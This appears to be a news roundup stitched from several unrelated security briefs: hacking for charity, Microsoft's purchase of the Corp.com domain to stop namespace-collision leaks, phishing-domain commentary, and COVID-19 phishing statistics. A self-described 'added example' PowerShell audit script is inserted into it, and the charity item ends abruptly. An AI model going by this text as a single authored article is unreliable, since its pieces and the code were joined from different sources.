Hacking for charity isn’t a new concept. The "2020 Hacker Report" published by HackerOne in February found that over a quarter of hackers carry out hacking activities "to protect and defend, do good, and help others."
Earlier this year, a team of four hackers known as The Syndicate took to Twitter to announce that they would be donating 5% of all live hacking event earnings to charity and 5% of their time in 2020 and beyond to volunteering.
Microsoft has purchased Corp.com for an undisclosed sum two months after the domain was advertised for sale at $1.7m.
The domain is believed to pose a danger to Microsoft's clients because of a "namespace collision" issue that occurs when domain names intended for exclusive use by an internal company network overlap with regular internet domains.
As a result of the collision, the Corp.com domain has been receiving an unending stream of passwords, emails, and other sensitive data from hundreds of thousands of Microsoft Windows PCs at major companies around the globe for years.
News of the transaction was broken by Brian Krebs on April 7. Corp.com's previous owner, Mike O'Connor, told Krebs that he "hoped Microsoft would buy it because hundreds of thousands of confused Windows PCs are constantly trying to share sensitive data with corp.com."
Wisconsin resident O'Connor had essentially done nothing with the domain since buying it 26 years ago. On April 6, he confirmed the sale of the domain to Microsoft for an undisclosed sum.
Microsoft said the acquisition of the domain was undertaken to protect the privacy of its customers.
In a written statement, the company said: “To help in keeping systems protected we encourage customers to practice safe security habits when planning for internal domain and network names.
“We released a security advisory in June of 2009 and a security update that helps keep customers safe. In our ongoing commitment to customer security, we also acquired the Corp.com domain.”
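One way for an administrator to audit a Windows client for the configuration pattern behind this collision, as an added example that is neither Microsoft's nor the article's code: it flags a single-label Active Directory domain, enabled DNS devolution, and search suffixes that are themselves public second-level names. The `$PublicTlds` list, the `$OwnedDomains` allow-list and the treatment of any two-label suffix as public are assumptions.

```powershell
# Added example: audit this Windows client's DNS suffix configuration for the
# internal/public namespace-collision pattern. Not Microsoft's code.
function Test-InternalSuffixCollisionRisk {
    [CmdletBinding()]
    param(
        # Assumed list of public TLDs to check search suffixes against.
        [string[]] $PublicTlds = @('com', 'net', 'org'),
        # Assumed allow-list of public domains the organization actually owns.
        [string[]] $OwnedDomains = @()
    )

    $cs       = Get-CimInstance -ClassName Win32_ComputerSystem
    $settings = Get-DnsClientGlobalSetting
    $findings = @()

    # Single-label AD domains (e.g. "corp" rather than "corp.example") are the
    # configuration Microsoft has long advised against, and the one whose name
    # overlaps a public second-level domain such as corp.com.
    if ($cs.PartOfDomain -and $cs.Domain.Split('.').Count -eq 1) {
        $findings += "AD domain '$($cs.Domain)' is single-label; it overlaps the public '$($cs.Domain).<tld>' namespace."
    }

    # Devolution retries unqualified names against progressively shorter parent
    # suffixes, which widens the set of public names an internal lookup can hit.
    if ($settings.UseDevolution) {
        $findings += "DNS devolution is enabled (level $($settings.DevolutionLevel))."
    }

    foreach ($suffix in $settings.SuffixSearchList) {
        $labels = $suffix.ToLower().Split('.')
        $isPublic2ld = ($labels.Count -eq 2) -and ($PublicTlds -contains $labels[-1])
        if ($isPublic2ld -and ($OwnedDomains -notcontains $suffix.ToLower())) {
            $findings += "Search suffix '$suffix' is a public domain not in the owned list; unqualified lookups may reach whoever registers it."
        }
    }

    [pscustomobject]@{
        ComputerName = $env:COMPUTERNAME
        ADDomain     = $cs.Domain
        Findings     = $findings
        AtRisk       = ($findings.Count -gt 0)
    }
}

# Usage; the owned domain below is a placeholder, not a real value.
Test-InternalSuffixCollisionRisk -OwnedDomains @('example.com') | Format-List
```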
Commenting on the sale, Jake Moore, cybersecurity specialist at ESET, said: “Domains are highly sought after by criminal hackers to add value when sending out phishy communications. If this particular web URL was used unethically, it could have caused a huge amount of misunderstanding—along with other potential consequences—to a large number of Microsoft customers.
"A typical trait of cyber criminals is to purchase similar domains to well-known brands so that when victims quickly check the sender’s address, it may look legitimate. Therefore, scammers can take advantage of their victim believing this false validation from the sender, encouraging them to click on dodgy links and attachments.
"It goes without saying that people need to double check sender addresses and not act on any unsolicited communication.”
Cybercrime levels have not increased since the start of COVID-19, and the volume of related attacks remains relatively low, according to new information from Microsoft and the US and UK governments.
The joint government alert came from the UK’s National Cyber Security Centre (NCSC) and US Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA).
It explained what many in the industry already know: that bad actors are using the pandemic as a lure to spread malware and harvest details via phishing emails, and are scanning for vulnerable VPNs.
It also warned that hackers are spamming out SMS phishing attempts, and emails spoofed to appear as if sent from popular video conferencing platforms such as Zoom or Microsoft Teams, containing booby-trapped attachments.
Yet despite the headlines, overall threat levels haven’t increased; attackers are simply diverting more resources to capitalize on widespread user awareness of the current crisis and changing working patterns.
“Malicious cyber-actors are adjusting their tactics to exploit the COVID-19 pandemic, and the NCSC is working round the clock with its partners to respond,” said NCSC director of operations, Paul Chichester.
“Our advice to the public and organizations is to remain vigilant and follow our guidance, and to only use trusted sources of information on the virus such as UK Government, Public Health England or NHS websites.”
It’s a message that was echoed by Microsoft in an update yesterday.
“Attackers don’t suddenly have more resources they’re diverting towards tricking users; instead they’re pivoting their existing infrastructure, like ransomware, phishing, and other malware delivery tools, to include COVID-19 keywords that get us to click,” explained Microsoft 365 Security CVP, Rob Lefferts.
“Our data shows that these COVID-19 themed threats are retreads of existing attacks that have been slightly altered to tie to this pandemic. This means we’re seeing a changing of lures, not a surge in attacks.”
In fact, of the millions of phishing emails Microsoft detects daily, only 60,000 carry COVID-19-related malicious attachments or URLs, less than 2% of the total threat volume the firm tracks each day.